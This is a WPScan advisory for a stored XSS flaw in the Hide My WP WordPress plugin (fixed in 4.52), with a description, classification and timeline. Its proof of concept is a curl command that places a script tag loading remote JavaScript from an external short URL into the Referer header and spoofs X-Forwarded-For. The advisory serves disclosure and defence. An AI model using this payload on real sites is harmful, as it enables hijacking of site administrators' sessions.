Hide My WP <= 4.51.1 - Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
An attacker can make a fake attack attempt, with a JavaScripting payload, which will be logged by the plugin, resulting in XSS. The attacker also can spoof their IP address in the logs by setting the X-FORWARDED-FOR header.
Proof of Concept
curl --referer '<script src="//ow.ly/gZrTh"> // () { :; };' --header 'X-FORWARDED-FOR: 8.8.8.8' http://example.com

The site's owner will get a notification about the fake attack attempt, when he checks it in the logs the JavaScript payload will be run.

Affects

Plugin hide_my_wp
fixed in version 4.52

References

URL http://codecanyon.net/item/hide-my-wp-no-one-can-know-you-use-wordpress/4177158

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter jurij
Views 253
Verified No
WPVDB ID 8119

Timeline

Publicly Published 2015-07-27 (over 1 year ago)
Added 2015-07-29 (over 1 year ago)
Last Updated 2015-07-29 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.